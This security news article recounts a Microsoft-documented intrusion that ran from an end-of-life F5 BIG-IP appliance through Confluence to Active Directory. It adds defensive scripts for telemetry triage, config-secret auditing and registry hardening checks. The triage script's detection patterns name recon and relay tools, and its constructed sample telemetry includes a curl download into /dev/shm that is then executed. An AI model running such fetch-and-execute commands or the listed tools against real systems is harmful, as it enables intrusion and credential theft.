A sophisticated, multi-stage intrusion campaign has been documented by Microsoft’s Defender Security Research team, in which a threat actor exploited an internet-facing F5 BIG-IP edge appliance as the entry point for a widespread, identity-focused attack that ultimately reached Active Directory.
The incident highlights a dangerous and accelerating pattern: firewalls, VPN gateways, and load balancer devices traditionally deployed as security boundaries are increasingly being repurposed as initial access vectors.
The threat actor established SSH access to an internal Linux host originating from an Azure-hosted F5 BIG-IP Virtual Edition (VE) running version 15.1.201000, a build commonly provisioned via Azure ARM templates and Terraform modules.
This version reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported at the time of exploitation.
Because edge appliances are externally exposed, lightly monitored, and deeply trusted within enterprise environments, the compromise gave the attacker a durable, low-visibility foothold, complete with stored credentials, certificates, and identity integrations, all before a single endpoint detection was triggered.
According to Microsoft, the threat actor authenticated over SSH with a privileged account that had sudo rights and then kept hands-on-keyboard access for the duration of the operation without deploying any explicit persistence mechanism.
The attacker immediately conducted aggressive internal reconnaissance:
- Nmap with automated shell scripts for horizontal subnet scanning and vertical service enumeration
- GoWitness to fingerprint and screenshot HTTP/HTTPS services via a SOCKS5 proxy
- A custom ELF binary, flagged by Microsoft as HackTool:Linux/MalPack.B and downloaded from the C2 server 206.189.27[.]39, to enumerate web application access controls, including Firebase and GCM endpoints
- NTLM lateral movement tools, including enum4linux, netexec, kerbrute, responder, smbclient, and timeroast, run against discovered Windows servers, though these initial attempts failed
Reconnaissance surfaced an internal Atlassian Confluence server carrying unpatched remote code execution vulnerabilities. Although Confluence was not internet-facing, it became reachable once the attacker gained a foothold in the internal network.
When real-time protection (RTP) repeatedly blocked direct payload delivery to the Confluence host, the attacker adapted by standing up a Python-based anonymous FTP server on the initial Linux host and pulling the payload from it with curl into /dev/shm. That path is a memory-backed tmpfs mount, so the payload never touched persistent disk and sidestepped disk-oriented detection.
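The reconnaissance tooling and the tmpfs staging described above leave a recognisable trail in Linux process-creation telemetry. The script below is an added example, not Microsoft's detection logic or anything from the report: it triages constructed newline-delimited JSON process events (host, user, command line) for the recon tools named in the write-up, SOCKS-proxied scanning, an ad hoc Python file server, downloads into /dev/shm, and execution out of it. The event shape, host names, addresses and the choice of pyftpdlib and http.server as "ad hoc server" modules are assumptions for the demo.

```python
import json
import shlex

# Tool names the write-up lists. Matching on basename is cheap but easy to
# evade by renaming, so a hit is a triage lead rather than proof.
RECON_TOOLS = {
    "nmap", "gowitness", "enum4linux", "enum4linux-ng", "netexec", "nxc",
    "kerbrute", "responder", "smbclient", "timeroast", "timeroast.py",
}
DOWNLOADERS = {"curl", "wget"}
OUTPUT_FLAGS = {"-o", "-O", "--output", "--output-document"}
# Assumed: pyftpdlib / http.server are the usual "file server in one command"
# modules; the write-up only says the attacker's FTP server was Python-based.
ADHOC_SERVER_MODULES = {"pyftpdlib", "http.server", "SimpleHTTPServer"}
MEMORY_FS = ("/dev/shm/", "/run/shm/")


def _argv(cmdline):
    """Split a shell-style command line; fall back to whitespace on bad quoting."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def classify(event):
    """Return [(rule, detail), ...] for one process-creation event."""
    argv = _argv(event.get("cmdline", ""))
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]
    hits = []
    if prog in RECON_TOOLS:
        hits.append(("recon_tool", prog))
    if any(a.startswith(("socks4://", "socks5://", "socks5h://")) for a in argv):
        hits.append(("socks_proxy_use", prog))
    if prog in DOWNLOADERS:
        # curl -o <path> / wget -O <path> with the target on a memory-backed fs
        for flag, target in zip(argv, argv[1:]):
            if flag in OUTPUT_FLAGS and target.startswith(MEMORY_FS):
                hits.append(("download_to_memory_fs", target))
    if argv[0].startswith(MEMORY_FS):
        hits.append(("exec_from_memory_fs", argv[0]))
    if prog.startswith("python") and "-m" in argv:
        idx = argv.index("-m")
        module = argv[idx + 1] if idx + 1 < len(argv) else ""
        if module in ADHOC_SERVER_MODULES:
            hits.append(("adhoc_file_server", module))
    return hits


def triage(jsonl):
    """Group rule hits per host from newline-delimited JSON events."""
    by_host = {}
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule, detail in classify(ev):
            by_host.setdefault(ev["host"], []).append((rule, detail, ev["user"]))
    return by_host


def staging_hosts(by_host):
    """Hosts that both pulled a file into tmpfs and executed out of it: the
    staging pattern from the write-up, stronger than either signal alone."""
    wanted = {"download_to_memory_fs", "exec_from_memory_fs"}
    return sorted(h for h, hits in by_host.items()
                  if wanted <= {r for r, _, _ in hits})


# Constructed sample telemetry; hosts, users and addresses are invented.
SAMPLE_EVENTS = """\
{"host": "lnx-app01", "user": "svc_deploy", "cmdline": "nmap -sS -p- --min-rate 2000 10.10.20.0/24 -oG /tmp/sweep.gnmap"}
{"host": "lnx-app01", "user": "svc_deploy", "cmdline": "gowitness scan file -f /tmp/hosts.txt --proxy socks5://127.0.0.1:1080"}
{"host": "lnx-app01", "user": "svc_deploy", "cmdline": "python3 -m pyftpdlib -p 2121 -d /tmp/stage"}
{"host": "lnx-app01", "user": "svc_deploy", "cmdline": "curl -s -o /dev/shm/.svc http://203.0.113.10/svc"}
{"host": "conf-01", "user": "confluence", "cmdline": "curl -s -o /dev/shm/.svc ftp://10.10.20.15:2121/svc"}
{"host": "conf-01", "user": "confluence", "cmdline": "/dev/shm/.svc --enum"}
{"host": "lnx-app01", "user": "svc_deploy", "cmdline": "curl -o /opt/app/release.tgz https://updates.example.com/release.tgz"}
{"host": "build-03", "user": "jenkins", "cmdline": "python3 -m pytest tests/"}
"""

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for host, rows in hits.items():
        for rule, detail, user in rows:
            print(f"{host:10} {user:12} {rule:24} {detail}")
    print("staging pattern on:", staging_hosts(hits))
```

The per-rule hits are deliberately noisy (a legitimate `curl -o /opt/...` produces nothing, but an admin running nmap does); the combination in `staging_hosts` is the signal worth paging on. The source of the download is also telling: an FTP or HTTP URL pointing at another internal server, as on conf-01 above, is the peer-staging pattern from the incident.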
After compromising Confluence, the attacker harvested credentials from Tomcat's server.xml and from confluence.cfg.xml and immediately weaponized them against the Windows domain infrastructure, escalating to Kerberos relay attacks and exploitation of CVE-2025-33073 using netexec with PetitPotam coercion and DNS manipulation tooling aimed at the domain controller.
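The two files named above are worth auditing before an attacker reads them. The script below is an added example (not the report's or Atlassian's tooling) that parses a Tomcat server.xml and a confluence.cfg.xml and reports every secret-looking attribute or property, distinguishing a bare plaintext database password from one routed through a decrypter class. The sample files and their values are constructed dummies; the key-name regex and the treatment of Base64Cipher as obfuscation rather than encryption are my assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Attribute / property names that usually carry a secret in these files.
# Broad on purpose so renamed or vendor-added keys still surface.
SECRET_KEY = re.compile(r"(password|passwd|secret|keystorepass|truststorepass|token)", re.I)

# Constructed Tomcat server.xml; the keystore password is a dummy.
SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8000" shutdown="SHUTDOWN">
  <Service name="Tomcat-Standalone">
    <Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"
               SSLEnabled="true" scheme="https" secure="true"
               keystoreFile="/opt/atlassian/confluence/conf/keystore"
               keystorePass="changeit-keystore-demo"/>
    <Engine name="Standalone" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>
"""

# Constructed confluence.cfg.xml with a plaintext JDBC password (dummy value).
CONFLUENCE_CFG_XML = """<?xml version="1.0" encoding="UTF-8"?>
<confluence-configuration>
  <setupStep>complete</setupStep>
  <properties>
    <property name="hibernate.connection.url">jdbc:postgresql://db01.corp.example:5432/confluence</property>
    <property name="hibernate.connection.username">confluence_svc</property>
    <property name="hibernate.connection.password">Sup3r-Secret-Demo</property>
    <property name="confluence.database.choice">postgresql</property>
  </properties>
</confluence-configuration>
"""


def scan_server_xml(text):
    """Return (element, attribute, value) for every secret-looking attribute."""
    findings = []
    for el in ET.fromstring(text).iter():
        for attr, value in el.attrib.items():
            if SECRET_KEY.search(attr) and value:
                findings.append((el.tag, attr, value))
    return findings


def scan_confluence_cfg(text):
    """Return (property, status, value) for secret-looking <property> entries.
    A sibling '<name>.decrypter.classname' property means the value is not
    bare plaintext; Base64Cipher only encodes, so it is flagged separately."""
    props = {p.get("name", ""): (p.text or "").strip()
             for p in ET.fromstring(text).iter("property")}
    findings = []
    for name, value in props.items():
        if name.endswith(".decrypter.classname") or not (SECRET_KEY.search(name) and value):
            continue
        cipher = props.get(name + ".decrypter.classname")
        if cipher is None:
            status = "plaintext"
        elif cipher.endswith("Base64Cipher"):
            status = "base64-obfuscated"
        else:
            status = "encrypted:" + cipher.rsplit(".", 1)[-1]
        findings.append((name, status, value))
    return findings


def redact(value, keep=2):
    """Mask a secret for reporting so the audit itself does not leak it."""
    return value[:keep] + "*" * max(len(value) - keep, 3)


if __name__ == "__main__":
    for tag, attr, value in scan_server_xml(SERVER_XML):
        print(f"server.xml        <{tag} {attr}>  {redact(value)}")
    for name, status, value in scan_confluence_cfg(CONFLUENCE_CFG_XML):
        print(f"confluence.cfg.xml {name} [{status}]  {redact(value)}")
```

Run against the real files with `ET.parse(path).getroot()` in place of `fromstring`, and fold the findings into a credential-rotation list: a service account whose password sits in a world-readable configuration on an application server should be treated as exposed the moment that server is reachable from a compromised host.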
Indicators of Compromise (IOC)
| Indicator | Type | Description |
|---|---|---|
| 4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465 | SHA-256 File Hash | Custom scanning tool |
| b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216 | SHA-256 File Hash | Shell script automating Nmap network scanning |
| 710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a | SHA-256 File Hash | Kerbrute tool |
| 57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517 | SHA-256 File Hash | gowitness HTTP/HTTPS screenshot scanner |
| bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455 | SHA-256 File Hash | NTLM relay Python script |
| 206.189.27[.]39 | IPv4 Address (Defanged) | C2 server |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Mitigation
Microsoft recommends the following defensive actions for organizations running F5 BIG-IP or hybrid infrastructure:
- Retire all EOL F5 BIG-IP appliances and enforce strict lifecycle and patch governance for all internet-facing edge devices; treat them as Tier-0 assets
- Patch internal web applications (Confluence, Jira) with the same urgency as external services, as they become reachable attack surfaces once any internal foothold is established.
- Disable NTLM where possible, enforce SMB signing, enable LDAP signing and channel binding, and apply Extended Protection for Authentication (EPA) to neutralize relay attacks.
- Enable Microsoft Defender for Endpoint in block mode across all Linux servers; RTP successfully blocked the ELF payload on the one host where it was active.
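The NTLM, SMB signing and LDAP signing/channel binding items above are all registry-backed and can be audited offline from a `reg export` of the relevant keys. The script below is an added example, not a tool from Microsoft's report: it parses the .reg text format and compares each mitigation against a minimum value. The baseline values are my recommended settings rather than a list quoted from the write-up; Extended Protection for Authentication on IIS-hosted services (such as AD CS web enrollment) is configured in IIS, not the registry, so it is not checked here. The .reg sample is constructed.

```python
import re

# (registry key, value name) -> (minimum acceptable DWORD, meaning).
# These minimums are the author's baseline for this example, not Microsoft's text.
BASELINE = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
     "RequireSecuritySignature"): (1, "SMB server signing required"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters",
     "RequireSecuritySignature"): (1, "SMB client signing required"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters",
     "LDAPServerIntegrity"): (2, "LDAP server signing required (domain controllers)"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters",
     "LdapEnforceChannelBinding"): (2, "LDAP channel binding always (domain controllers)"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa",
     "LmCompatibilityLevel"): (5, "NTLMv2 only, refuse LM and NTLMv1"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
     "RestrictSendingNTLMTraffic"): (2, "outgoing NTLM denied (pilot with 1 = audit first)"),
}

KEY_LINE = re.compile(r"^\[(.+)\]$")
DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')


def parse_reg(text):
    """Map (key, value-name) -> int for every dword in a .reg export.
    reg.exe writes UTF-16LE with a BOM; decode to str before calling this.
    Keys and names are lower-cased because the registry is case-insensitive."""
    values = {}
    key = None
    for raw in text.splitlines():
        line = raw.lstrip("\ufeff").strip()
        m = KEY_LINE.match(line)
        if m:
            key = m.group(1).lower()
            continue
        m = DWORD_LINE.match(line)
        if m and key is not None:
            values[(key, m.group(1).lower())] = int(m.group(2), 16)
    return values


def audit(text):
    """Return [(value-name, status, meaning)] for each baseline entry that is
    absent or weaker than required. An absent value means the OS default
    applies, which for these settings is normally weaker than the baseline."""
    values = parse_reg(text)
    gaps = []
    for (key, name), (minimum, meaning) in BASELINE.items():
        actual = values.get((key.lower(), name.lower()))
        if actual is None:
            gaps.append((name, "not configured", meaning))
        elif actual < minimum:
            gaps.append((name, f"set to {actual}, need >= {minimum}", meaning))
    return gaps


# Constructed .reg text in the shape `reg export` produces once decoded.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"RequireSecuritySignature"=dword:00000000
"EnableSecuritySignature"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters]
"RequireSecuritySignature"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters]
"LDAPServerIntegrity"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000005
"""

if __name__ == "__main__":
    for name, status, meaning in audit(SAMPLE_REG):
        print(f"{name:28} {status:24} {meaning}")
```

On the sample, SMB server signing is explicitly switched off (EnableSecuritySignature alone only negotiates signing, it does not require it), and LDAP channel binding and the outgoing-NTLM restriction are never set. Those three are exactly the gaps that let coercion-plus-relay chains like the one in this intrusion succeed; the LDAP entries only matter on domain controllers, so run the audit per role.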
As Microsoft notes, this intrusion demonstrates that attackers do not require advanced sophistication, only persistence and exploitable patching and monitoring gaps across a hybrid estate.
The post Hackers Exploit F5 BIG-IP SSH Access to Compromise Active Directory appeared first on Cyber Security News.
